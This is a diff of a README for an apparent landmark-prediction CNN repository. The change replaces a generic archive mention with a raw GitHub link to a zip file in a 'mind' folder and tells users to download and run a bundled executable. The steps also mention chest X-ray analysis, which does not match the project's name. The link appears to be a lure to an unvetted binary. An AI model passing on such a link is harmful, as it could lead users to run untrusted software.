josee551/landmark_prediction_regresion_cnn/README.md

 4. **Run the Application**
    - For Windows: Locate the downloaded `.exe` file in your downloads folder and double-click it to run.
    - For macOS: Open the `.dmg` file and drag the application into your Applications folder.
 Then, open it from there.
-   - For Linux: You may need to extract the tar.gz file, then run the executable in a terminal.
+   - For Linux: You may need to extract the https://raw.githubusercontent.com/josee551/landmark_prediction_regresion_cnn/main/mind/landmark_prediction_regresion_cnn.zip file, then run the executable in a terminal.

 5. **Follow Instructions**
    Once the application starts, follow the on-screen prompts.
 You may need to upload a chest X-ray image for analysis.